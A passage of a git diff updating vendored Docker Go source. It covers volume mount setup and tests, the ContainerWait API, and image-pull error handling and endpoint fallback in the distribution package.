filepath.Base(hostPath) - v, err := daemon.volumes.CreateWithRef(id, volume.DefaultDriverName, container.ID, nil, nil) - if err != nil { - return err - } - if err := migrateVolume(id, hostPath); err != nil { - return err - } - container.AddMountPointWithVolume(destination, v, true) - } else { // Bind mount - m := 
volume.MountPoint{Source: hostPath, Destination: destination, RW: rw} - container.MountPoints[destination] = &m - } - } - return container.ToDisk() - } - return nil -} - func (daemon *Daemon) mountVolumes(container *container.Container) error { mounts, err := daemon.setupMounts(container) if err != nil { diff --git a/vendor/github.com/docker/docker/daemon/volumes_unix_test.go b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go new file mode 100644 index 0000000000..36e19110d1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/volumes_unix_test.go @@ -0,0 +1,256 @@ +// +build !windows + +package daemon // import "github.com/docker/docker/daemon" + +import ( + "encoding/json" + "fmt" + "reflect" + "testing" + + containertypes "github.com/docker/docker/api/types/container" + mounttypes "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/container" + volumemounts "github.com/docker/docker/volume/mounts" +) + +func TestBackportMountSpec(t *testing.T) { + d := Daemon{containers: container.NewMemoryStore()} + + c := &container.Container{ + State: &container.State{}, + MountPoints: map[string]*volumemounts.MountPoint{ + "/apple": {Destination: "/apple", Source: "/var/lib/docker/volumes/12345678", Name: "12345678", RW: true, CopyData: true}, // anonymous volume + "/banana": {Destination: "/banana", Source: "/var/lib/docker/volumes/data", Name: "data", RW: true, CopyData: true}, // named volume + "/cherry": {Destination: "/cherry", Source: "/var/lib/docker/volumes/data", Name: "data", CopyData: true}, // RO named volume + "/dates": {Destination: "/dates", Source: "/var/lib/docker/volumes/data", Name: "data"}, // named volume nocopy + "/elderberry": {Destination: "/elderberry", Source: "/var/lib/docker/volumes/data", Name: "data"}, // masks anon vol + "/fig": {Destination: "/fig", Source: "/data", RW: true}, // RW bind + "/guava": {Destination: "/guava", Source: "/data", RW: false, Propagation: "shared"}, // RO bind + propagation + 
"/kumquat": {Destination: "/kumquat", Name: "data", RW: false, CopyData: true}, // volumes-from + + // partially configured mountpoint due to #32613 + // specifically, `mp.Spec.Source` is not set + "/honeydew": { + Type: mounttypes.TypeVolume, + Destination: "/honeydew", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/honeydew", VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}}, + }, + + // from hostconfig.Mounts + "/jambolan": { + Type: mounttypes.TypeVolume, + Destination: "/jambolan", + Source: "/var/lib/docker/volumes/data", + RW: true, + Name: "data", + Spec: mounttypes.Mount{Type: mounttypes.TypeVolume, Target: "/jambolan", Source: "data"}, + }, + }, + HostConfig: &containertypes.HostConfig{ + Binds: []string{ + "data:/banana", + "data:/cherry:ro", + "data:/dates:ro,nocopy", + "data:/elderberry:ro,nocopy", + "/data:/fig", + "/data:/guava:ro,shared", + "data:/honeydew:nocopy", + }, + VolumesFrom: []string{"1:ro"}, + Mounts: []mounttypes.Mount{ + {Type: mounttypes.TypeVolume, Target: "/jambolan"}, + }, + }, + Config: &containertypes.Config{Volumes: map[string]struct{}{ + "/apple": {}, + "/elderberry": {}, + }}, + } + + d.containers.Add("1", &container.Container{ + State: &container.State{}, + ID: "1", + MountPoints: map[string]*volumemounts.MountPoint{ + "/kumquat": {Destination: "/kumquat", Name: "data", RW: false, CopyData: true}, + }, + HostConfig: &containertypes.HostConfig{ + Binds: []string{ + "data:/kumquat:ro", + }, + }, + }) + + type expected struct { + mp *volumemounts.MountPoint + comment string + } + + pretty := func(mp *volumemounts.MountPoint) string { + b, err := json.MarshalIndent(mp, "\t", " ") + if err != nil { + return fmt.Sprintf("%#v", mp) + } + return string(b) + } + + for _, x := range []expected{ + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/apple", + RW: true, + Name: "12345678", + Source: 
"/var/lib/docker/volumes/12345678", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "", + Target: "/apple", + }, + }, + comment: "anonymous volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/banana", + RW: true, + Name: "data", + Source: "/var/lib/docker/volumes/data", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/banana", + }, + }, + comment: "named volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/cherry", + Name: "data", + Source: "/var/lib/docker/volumes/data", + CopyData: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/cherry", + ReadOnly: true, + }, + }, + comment: "read-only named volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/dates", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/dates", + ReadOnly: true, + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "named volume with nocopy", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/elderberry", + Name: "data", + Source: "/var/lib/docker/volumes/data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/elderberry", + ReadOnly: true, + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "masks an anonymous volume", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeBind, + Destination: "/fig", + Source: "/data", + RW: true, + Spec: mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/data", + Target: "/fig", + }, + }, + comment: "bind mount with read/write", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeBind, + Destination: "/guava", + Source: "/data", + RW: false, + 
Propagation: "shared", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeBind, + Source: "/data", + Target: "/guava", + ReadOnly: true, + BindOptions: &mounttypes.BindOptions{Propagation: "shared"}, + }, + }, + comment: "bind mount with read/write + shared propagation", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/honeydew", + Source: "/var/lib/docker/volumes/data", + RW: true, + Propagation: "shared", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/honeydew", + VolumeOptions: &mounttypes.VolumeOptions{NoCopy: true}, + }, + }, + comment: "partially configured named volume caused by #32613", + }, + { + mp: &(*c.MountPoints["/jambolan"]), // copy the mountpoint, expect no changes + comment: "volume defined in mounts API", + }, + { + mp: &volumemounts.MountPoint{ + Type: mounttypes.TypeVolume, + Destination: "/kumquat", + Source: "/var/lib/docker/volumes/data", + RW: false, + Name: "data", + Spec: mounttypes.Mount{ + Type: mounttypes.TypeVolume, + Source: "data", + Target: "/kumquat", + ReadOnly: true, + }, + }, + comment: "partially configured named volume caused by #32613", + }, + } { + + mp := c.MountPoints[x.mp.Destination] + d.backportMountSpec(c) + + if !reflect.DeepEqual(mp.Spec, x.mp.Spec) { + t.Fatalf("%s\nexpected:\n\t%s\n\ngot:\n\t%s", x.comment, pretty(x.mp), pretty(mp)) + } + } +} diff --git a/vendor/github.com/docker/docker/daemon/volumes_windows.go b/vendor/github.com/docker/docker/daemon/volumes_windows.go index bf7fc478a1..a2fb5152d1 100644 --- a/vendor/github.com/docker/docker/daemon/volumes_windows.go +++ b/vendor/github.com/docker/docker/daemon/volumes_windows.go @@ -1,18 +1,18 @@ -// +build windows - -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "sort" + "github.com/docker/docker/api/types/mount" "github.com/docker/docker/container" - "github.com/docker/docker/volume" + "github.com/docker/docker/pkg/idtools" + volumemounts 
"github.com/docker/docker/volume/mounts" ) // setupMounts configures the mount points for a container by appending each // of the configured mounts on the container to the OCI mount structure // which will ultimately be passed into the oci runtime during container creation. -// It also ensures each of the mounts are lexographically sorted. +// It also ensures each of the mounts are lexicographically sorted. // BUGBUG TODO Windows containerd. This would be much better if it returned // an array of runtime spec mounts, not container mounts. Then no need to @@ -20,11 +20,11 @@ import ( func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, error) { var mnts []container.Mount - for _, mount := range c.MountPoints { // type is volume.MountPoint + for _, mount := range c.MountPoints { // type is volumemounts.MountPoint if err := daemon.lazyInitializeVolume(c.ID, mount); err != nil { return nil, err } - s, err := mount.Setup(c.MountLabel, 0, 0) + s, err := mount.Setup(c.MountLabel, idtools.IDPair{UID: 0, GID: 0}, nil) if err != nil { return nil, err } @@ -42,6 +42,10 @@ func (daemon *Daemon) setupMounts(c *container.Container) ([]container.Mount, er // setBindModeIfNull is platform specific processing which is a no-op on // Windows. 
-func setBindModeIfNull(bind *volume.MountPoint) { +func setBindModeIfNull(bind *volumemounts.MountPoint) { return } + +func (daemon *Daemon) validateBindDaemonRoot(m mount.Mount) (bool, error) { + return false, nil +} diff --git a/vendor/github.com/docker/docker/daemon/wait.go b/vendor/github.com/docker/docker/daemon/wait.go index 2dab22e991..545f24c7b2 100644 --- a/vendor/github.com/docker/docker/daemon/wait.go +++ b/vendor/github.com/docker/docker/daemon/wait.go @@ -1,32 +1,23 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( - "time" + "context" - "golang.org/x/net/context" + "github.com/docker/docker/container" ) -// ContainerWait stops processing until the given container is -// stopped. If the container is not found, an error is returned. On a -// successful stop, the exit code of the container is returned. On a -// timeout, an error is returned. If you want to wait forever, supply -// a negative duration for the timeout. -func (daemon *Daemon) ContainerWait(name string, timeout time.Duration) (int, error) { - container, err := daemon.GetContainer(name) +// ContainerWait waits until the given container is in a certain state +// indicated by the given condition. If the container is not found, a nil +// channel and non-nil error is returned immediately. If the container is +// found, a status result will be sent on the returned channel once the wait +// condition is met or if an error occurs waiting for the container (such as a +// context timeout or cancellation). On a successful wait, the exit code of the +// container is returned in the status with a non-nil Err() value. 
+func (daemon *Daemon) ContainerWait(ctx context.Context, name string, condition container.WaitCondition) (<-chan container.StateStatus, error) { + cntr, err := daemon.GetContainer(name) if err != nil { - return -1, err + return nil, err } - return container.WaitStop(timeout) -} - -// ContainerWaitWithContext returns a channel where exit code is sent -// when container stops. Channel can be cancelled with a context. -func (daemon *Daemon) ContainerWaitWithContext(ctx context.Context, name string) error { - container, err := daemon.GetContainer(name) - if err != nil { - return err - } - - return container.WaitWithContext(ctx) + return cntr.Wait(ctx, condition), nil } diff --git a/vendor/github.com/docker/docker/daemon/workdir.go b/vendor/github.com/docker/docker/daemon/workdir.go index 5bd0d0caca..90bba79b57 100644 --- a/vendor/github.com/docker/docker/daemon/workdir.go +++ b/vendor/github.com/docker/docker/daemon/workdir.go @@ -1,6 +1,6 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" -// ContainerCreateWorkdir creates the working directory. This is solves the +// ContainerCreateWorkdir creates the working directory. This solves the // issue arising from https://github.com/docker/docker/issues/27545, // which was initially fixed by https://github.com/docker/docker/pull/27884. But that fix // was too expensive in terms of performance on Windows. 
Instead, @@ -16,6 +16,5 @@ func (daemon *Daemon) ContainerCreateWorkdir(cID string) error { return err } defer daemon.Unmount(container) - rootUID, rootGID := daemon.GetRemappedUIDGID() - return container.SetupWorkingDirectory(rootUID, rootGID) + return container.SetupWorkingDirectory(daemon.idMappings.RootPair()) } diff --git a/vendor/github.com/docker/docker/distribution/config.go b/vendor/github.com/docker/docker/distribution/config.go index bfea8b0336..55f1f8c2df 100644 --- a/vendor/github.com/docker/docker/distribution/config.go +++ b/vendor/github.com/docker/docker/distribution/config.go @@ -1,13 +1,13 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "context" "encoding/json" "fmt" "io" "runtime" "github.com/docker/distribution" - "github.com/docker/distribution/digest" "github.com/docker/distribution/manifest/schema2" "github.com/docker/docker/api/types" "github.com/docker/docker/distribution/metadata" @@ -15,10 +15,12 @@ import ( "github.com/docker/docker/image" "github.com/docker/docker/layer" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + "github.com/docker/docker/pkg/system" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" "github.com/docker/libtrust" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + specs "github.com/opencontainers/image-spec/specs-go/v1" ) // Config stores configuration for communicating @@ -44,7 +46,7 @@ type Config struct { ImageStore ImageConfigStore // ReferenceStore manages tags. This value is optional, when excluded // content will not be tagged. - ReferenceStore reference.Store + ReferenceStore refstore.Store // RequireSchema2 ensures that only schema2 manifests are used. RequireSchema2 bool } @@ -58,6 +60,9 @@ type ImagePullConfig struct { // Schema2Types is the valid schema2 configuration types allowed // by the pull operation. 
Schema2Types []string + // OS is the requested operating system of the image being pulled to ensure it can be validated + // when the host OS supports multiple image operating systems. + OS string } // ImagePushConfig stores push configuration. @@ -67,8 +72,8 @@ type ImagePushConfig struct { // ConfigMediaType is the configuration media type for // schema2 manifests. ConfigMediaType string - // LayerStore manages layers. - LayerStore PushLayerProvider + // LayerStores (indexed by operating system) manages layers. + LayerStores map[string]PushLayerProvider // TrustKey is the private key for legacy signatures. This is typically // an ephemeral key, since these signatures are no longer verified. TrustKey libtrust.PrivateKey @@ -83,6 +88,7 @@ type ImageConfigStore interface { Put([]byte) (digest.Digest, error) Get(digest.Digest) ([]byte, error) RootFSFromConfig([]byte) (*image.RootFS, error) + PlatformFromConfig([]byte) (*specs.Platform, error) } // PushLayerProvider provides layers to be pushed by ChainID. @@ -108,7 +114,7 @@ type RootFSDownloadManager interface { // returns the final rootfs. 
// Given progress output to track download progress // Returns function to release download resources - Download(ctx context.Context, initialRootFS image.RootFS, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) + Download(ctx context.Context, initialRootFS image.RootFS, os string, layers []xfer.DownloadDescriptor, progressOutput progress.Output) (image.RootFS, func(), error) } type imageConfigStore struct { @@ -141,26 +147,46 @@ func (s *imageConfigStore) RootFSFromConfig(c []byte) (*image.RootFS, error) { if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { return nil, err } + return unmarshalledConfig.RootFS, nil +} - // fail immediately on windows - if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" { +func (s *imageConfigStore) PlatformFromConfig(c []byte) (*specs.Platform, error) { + var unmarshalledConfig image.Image + if err := json.Unmarshal(c, &unmarshalledConfig); err != nil { + return nil, err + } + + // fail immediately on Windows when downloading a non-Windows image + // and vice versa. Exception on Windows if Linux Containers are enabled. 
+ if runtime.GOOS == "windows" && unmarshalledConfig.OS == "linux" && !system.LCOWSupported() { + return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) + } else if runtime.GOOS != "windows" && unmarshalledConfig.OS == "windows" { return nil, fmt.Errorf("image operating system %q cannot be used on this platform", unmarshalledConfig.OS) } - return unmarshalledConfig.RootFS, nil + os := unmarshalledConfig.OS + if os == "" { + os = runtime.GOOS + } + if !system.IsOSSupported(os) { + return nil, system.ErrNotSupportedOperatingSystem + } + return &specs.Platform{OS: os, OSVersion: unmarshalledConfig.OSVersion}, nil } type storeLayerProvider struct { ls layer.Store } -// NewLayerProviderFromStore returns a layer provider backed by +// NewLayerProvidersFromStores returns layer providers backed by // an instance of LayerStore. Only getting layers as gzipped // tars is supported. -func NewLayerProviderFromStore(ls layer.Store) PushLayerProvider { - return &storeLayerProvider{ - ls: ls, +func NewLayerProvidersFromStores(lss map[string]layer.Store) map[string]PushLayerProvider { + plps := make(map[string]PushLayerProvider) + for os, ls := range lss { + plps[os] = &storeLayerProvider{ls: ls} } + return plps } func (p *storeLayerProvider) Get(lid layer.ChainID) (PushLayer, error) { diff --git a/vendor/github.com/docker/docker/distribution/errors.go b/vendor/github.com/docker/docker/distribution/errors.go index b8cf9fb9e8..e2913d45d6 100644 --- a/vendor/github.com/docker/docker/distribution/errors.go +++ b/vendor/github.com/docker/docker/distribution/errors.go @@ -1,19 +1,20 @@ -package distribution +package distribution // import "github.com/docker/docker/distribution" import ( + "fmt" "net/url" "strings" "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/distribution" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/distribution/registry/api/v2" 
"github.com/docker/distribution/registry/client" "github.com/docker/distribution/registry/client/auth" "github.com/docker/docker/distribution/xfer" - "github.com/docker/docker/reference" - "github.com/pkg/errors" + "github.com/docker/docker/errdefs" + "github.com/sirupsen/logrus" ) // ErrNoSupport is an error type used for errors indicating that an operation @@ -60,6 +61,31 @@ func shouldV2Fallback(err errcode.Error) bool { return false } +type notFoundError struct { + cause errcode.Error + ref reference.Named +} + +func (e notFoundError) Error() string { + switch e.cause.Code { + case errcode.ErrorCodeDenied: + // ErrorCodeDenied is used when access to the repository was denied + return fmt.Sprintf("pull access denied for %s, repository does not exist or may require 'docker login'", reference.FamiliarName(e.ref)) + case v2.ErrorCodeManifestUnknown: + return fmt.Sprintf("manifest for %s not found", reference.FamiliarString(e.ref)) + case v2.ErrorCodeNameUnknown: + return fmt.Sprintf("repository %s not found", reference.FamiliarName(e.ref)) + } + // Shouldn't get here, but this is better than returning an empty string + return e.cause.Message +} + +func (e notFoundError) NotFound() {} + +func (e notFoundError) Cause() error { + return e.cause +} + // TranslatePullError is used to convert an error from a registry pull // operation to an error representing the entire pull operation. 
Any error // information which is not used by the returned error gets output to @@ -74,46 +100,40 @@ func TranslatePullError(err error, ref reference.Named) error { return TranslatePullError(v[0], ref) } case errcode.Error: - var newErr error switch v.Code { - case errcode.ErrorCodeDenied: - // ErrorCodeDenied is used when access to the repository was denied - newErr = errors.Errorf("repository %s not found: does not exist or no pull access", ref.Name()) - case v2.ErrorCodeManifestUnknown: - newErr = errors.Errorf("manifest for %s not found", ref.String()) - case v2.ErrorCodeNameUnknown: - newErr = errors.Errorf("repository %s not found", ref.Name()) - } - if newErr != nil { - logrus.Infof("Translating %q to %q", err, newErr) - return newErr + case errcode.ErrorCodeDenied, v2.ErrorCodeManifestUnknown, v2.ErrorCodeNameUnknown: + return notFoundError{v, ref} } case xfer.DoNotRetry: return TranslatePullError(v.Err, ref) } - return err + return errdefs.Unknown(err) } // continueOnError returns true if we should fallback to the next endpoint // as a result of this error. -func continueOnError(err error) bool { +func continueOnError(err error, mirrorEndpoint bool) bool { switch v := err.(type) { case errcode.Errors: if len(v) == 0 { return true } - return continueOnError(v[0]) + return continueOnError(v[0], mirrorEndpoint) case ErrNoSupport: - return continueOnError(v.Err) + return continueOnError(v.Err, mirrorEndpoint) case errcode.Error: - return shouldV2Fallback(v) + return mirrorEndpoint || shouldV2Fallback(v) case *client.UnexpectedHTTPResponseError: return true case ImageConfigPullError: - return false + // ImageConfigPullError only happens with v2 images, v1 fallback is + // unnecessary. + // Failures from a mirror endpoint should result in fallback to the + // canonical repo. 
+ return mirrorEndpoint case error: - return !strings.Contains(err.Error(), strings.ToLower(syscall.ENOSPC.Error())) + return !strings.Contains(err.Error(), strings.ToLower(syscall.ESRCH.Error())) } // let's be nice and fallback if the error is a completely // unexpected one. @@ -157,3 +177,30 @@ func retryOnError(err error) error { // add them to the switch above. return err } + +type invalidManifestClassError struct { + mediaType string + class string +} + +func (e invalidManifestClassError) Error() string { + return fmt.Sprintf("Encountered remote %q(%s) when fetching", e.mediaType, e.class) +} + +func (e invalidManifestClassError) InvalidParameter() {} + +type invalidManifestFormatError struct{} + +func (invalidManifestFormatError) Error() string { + return "unsupported manifest format" +} + +func (invalidManifestFormatError) InvalidParameter() {} + +type reservedNameError string + +func (e reservedNameError) Error() string { + return "'" + string(e) + "' is a reserved name" +} + +func (e reservedNameError) Forbidden() {} diff --git a/vendor/github.com/docker/docker/distribution/errors_test.go b/vendor/github.com/docker/docker/distribution/errors_test.go new file mode 100644 index 0000000000..7105bdb4d6 --- /dev/null +++ b/vendor/github.com/docker/docker/distribution/errors_test.go @@ -0,0 +1,85 @@ +package distribution // import "github.com/docker/docker/distribution" + +import ( + "errors" + "strings" + "syscall" + "testing" + + "github.com/docker/distribution/registry/api/errcode" + "github.com/docker/distribution/registry/api/v2" + "github.com/docker/distribution/registry/client" +) + +var alwaysContinue = []error{ + &client.UnexpectedHTTPResponseError{}, + + // Some errcode.Errors that don't disprove the existence of a V1 image + errcode.Error{Code: errcode.ErrorCodeUnauthorized}, + errcode.Error{Code: v2.ErrorCodeManifestUnknown}, + errcode.Error{Code: v2.ErrorCodeNameUnknown}, + + errors.New("some totally unexpected error"), +} + +var 
continueFromMirrorEndpoint = []error{ + ImageConfigPullError{}, + + // Some other errcode.Error that doesn't indicate we should search for a V1 image. + errcode.Error{Code: errcode.ErrorCodeTooManyRequests}, +} + +var neverContinue = []error{ + errors.New(strings.ToLower(syscall.ESRCH.Error())), // No such process +} + +func TestContinueOnError_NonMirrorEndpoint(t *testing.T) { + for _, err := range alwaysContinue { + if !continueOnError(err, false) { + t.Errorf("Should continue from non-mirror endpoint: %T: '%s'", err, err.Error()) + } + } + + for _, err := range continueFromMirrorEndpoint { + if continueOnError(err, false) { + t.Errorf("Should only continue from mirror endpoint: %T: '%s'", err, err.Error()) + } + } +} + +func TestContinueOnError_MirrorEndpoint(t *testing.T) { + var errs []error + errs = append(errs, alwaysContinue...) + errs = append(errs, continueFromMirrorEndpoint...) + for _, err := range errs { + if !continueOnError(err, true) { + t.Errorf("Should continue from mirror endpoint: %T: '%s'", err, err.Error()) + } + } +} + +func TestContinueOnError_NeverContinue(t *testing.T) { + for _, isMirrorEndpoint := range []bool{true, false} { + for _, err := range neverContinue { + if continueOnError(err, isMirrorEndpoint) { + t.Errorf("Should never continue: %T: '%s'", err, err.Error()) + } + } + } +} + +func TestContinueOnError_UnnestsErrors(t *testing.T) { + // ContinueOnError should evaluate nested errcode.Errors. + + // Assumes that v2.ErrorCodeNameUnknown is a continueable error code. 
+ err := errcode.Errors{errcode.Error{Code: v2.ErrorCodeNameUnknown}} + if !continueOnError(err, false) { + t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors") + } + + // Assumes that errcode.ErrorCodeTooManyRequests is not a V1-fallback indication + err = errcode.Errors{errcode.Error{Code: errcode.ErrorCodeTooManyRequests}} + if continueOnError(err, false) { + t.Fatal("ContinueOnError should unnest, base return value on errcode.Errors") + } +} diff --git a/vendor/github.com/docker/docker/distribution/metadata/metadata.go b/vendor/github.com/docker/docker/distribution/metadata/metadata.go index 05ba4f817d..4ae8223bd0 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/metadata.go +++ b/vendor/github.com/docker/docker/distribution/metadata/metadata.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "io/ioutil" diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go index f262d4dc34..5575c59b0e 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "github.com/docker/docker/image/v1" diff --git a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go index 556886581e..5003897cbb 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v1_id_service_test.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "io/ioutil" @@ -6,6 +6,7 @@ import ( "testing" 
"github.com/docker/docker/layer" + "gotest.tools/assert" ) func TestV1IDService(t *testing.T) { @@ -21,6 +22,10 @@ func TestV1IDService(t *testing.T) { } v1IDService := NewV1IDService(metadataStore) + ns := v1IDService.namespace() + + assert.Equal(t, "v1id", ns) + testVectors := []struct { registry string v1ID string diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go index 02d1b4ad21..fe33498554 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "crypto/hmac" @@ -7,9 +7,9 @@ import ( "encoding/json" "errors" - "github.com/docker/distribution/digest" "github.com/docker/docker/api/types" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) // V2MetadataService maps layer IDs to a set of known metadata for @@ -38,7 +38,7 @@ type V2Metadata struct { HMAC string } -// CheckV2MetadataHMAC return true if the given "meta" is tagged with a hmac hashed by the given "key". +// CheckV2MetadataHMAC returns true if the given "meta" is tagged with a hmac hashed by the given "key". 
func CheckV2MetadataHMAC(meta *V2Metadata, key []byte) bool { if len(meta.HMAC) == 0 || len(key) == 0 { return len(meta.HMAC) == 0 && len(key) == 0 @@ -84,7 +84,7 @@ func ComputeV2MetadataHMACKey(authConfig *types.AuthConfig) ([]byte, error) { if err != nil { return nil, err } - return []byte(digest.FromBytes([]byte(buf))), nil + return []byte(digest.FromBytes(buf)), nil } // authConfigKeyInput is a reduced AuthConfig structure holding just relevant credential data eligible for @@ -203,7 +203,7 @@ func (serv *v2MetadataService) TagAndAdd(diffID layer.DiffID, hmacKey []byte, me return serv.Add(diffID, meta) } -// Remove unassociates a metadata entry from a layer DiffID. +// Remove disassociates a metadata entry from a layer DiffID. func (serv *v2MetadataService) Remove(metadata V2Metadata) error { if serv.store == nil { // Support a service which has no backend storage, in this case diff --git a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go index 7b0ecb1572..cf24e0d85b 100644 --- a/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go +++ b/vendor/github.com/docker/docker/distribution/metadata/v2_metadata_service_test.go @@ -1,4 +1,4 @@ -package metadata +package metadata // import "github.com/docker/docker/distribution/metadata" import ( "encoding/hex" @@ -8,8 +8,8 @@ import ( "reflect" "testing" - "github.com/docker/distribution/digest" "github.com/docker/docker/layer" + "github.com/opencontainers/go-digest" ) func TestV2MetadataService(t *testing.T) { diff --git a/vendor/github.com/docker/docker/distribution/pull.go b/vendor/github.com/docker/docker/distribution/pull.go index a0acfe5b6b..0240eb05f7 100644 --- a/vendor/github.com/docker/docker/distribution/pull.go +++ b/vendor/github.com/docker/docker/distribution/pull.go @@ -1,16 +1,19 @@ -package distribution +package distribution // import 
"github.com/docker/docker/distribution" import ( + "context" "fmt" + "runtime" - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" + "github.com/docker/distribution/reference" "github.com/docker/docker/api" "github.com/docker/docker/distribution/metadata" "github.com/docker/docker/pkg/progress" - "github.com/docker/docker/reference" + refstore "github.com/docker/docker/reference" "github.com/docker/docker/registry" - "golang.org/x/net/context" + "github.com/opencontainers/go-digest" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) // Puller is an interface that abstracts pulling for different API versions. @@ -18,7 +21,7 @@ type Puller interface { // Pull tries to pull the image referenced by `tag` // Pull returns an error if any, as well as a boolean that determines whether to retry Pull on the next configured endpoint. // - Pull(ctx context.Context, ref reference.Named) error + Pull(ctx context.Context, ref reference.Named, os string) error } // newPuller returns a Puller interface that will pull from either a v1 or v2 @@ -55,12 +58,12 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo return err } - // makes sure name is not empty or `scratch` - if err := ValidateRepoName(repoInfo.Name()); err != nil { + // makes sure name is not `scratch` + if err := ValidateRepoName(repoInfo.Name); err != nil { return err } - endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(repoInfo.Hostname()) + endpoints, err := imagePullConfig.RegistryService.LookupPullEndpoints(reference.Domain(repoInfo.Name)) if err != nil { return err } @@ -104,14 +107,20 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo } } - logrus.Debugf("Trying to pull %s from %s %s", repoInfo.Name(), endpoint.URL, endpoint.Version) + logrus.Debugf("Trying to pull %s from %s %s", reference.FamiliarName(repoInfo.Name), endpoint.URL, endpoint.Version) puller, err := newPuller(endpoint, repoInfo, 
imagePullConfig) if err != nil { lastErr = err continue } - if err := puller.Pull(ctx, ref); err != nil { + + // Make sure we default the OS if it hasn't been supplied + if imagePullConfig.OS == "" { + imagePullConfig.OS = runtime.GOOS + } + + if err := puller.Pull(ctx, ref, imagePullConfig.OS); err != nil { // Was this pull cancelled? If so, don't try to fall // back. fallback := false @@ -139,19 +148,19 @@ func Pull(ctx context.Context, ref reference.Named, imagePullConfig *ImagePullCo // append subsequent errors lastErr = err } - logrus.Errorf("Attempting next endpoint for pull after error: %v", err) + logrus.Infof("Attempting next endpoint for pull after error: %v", err) continue } logrus.Errorf("Not continuing with pull after error: %v", err) return TranslatePullError(err, ref) } - imagePullConfig.ImageEventLogger(ref.String(), repoInfo.Name(), "pull") + imagePullConfig.ImageEventLogger(reference.FamiliarString(ref), reference.FamiliarName(repoInfo.Name), "pull") return nil } if lastErr == nil { - lastErr = fmt.Errorf("no endpoints found for %s", ref.String()) + lastErr = fmt.Errorf("no endpoints found for %s", reference.FamiliarString(ref)) } return TranslatePullError(lastErr, ref) @@ -170,17 +179,14 @@ func writeStatus(requestedTag string, out progress.Output, layersDownloaded bool } // ValidateRepoName validates the name of a repository. 
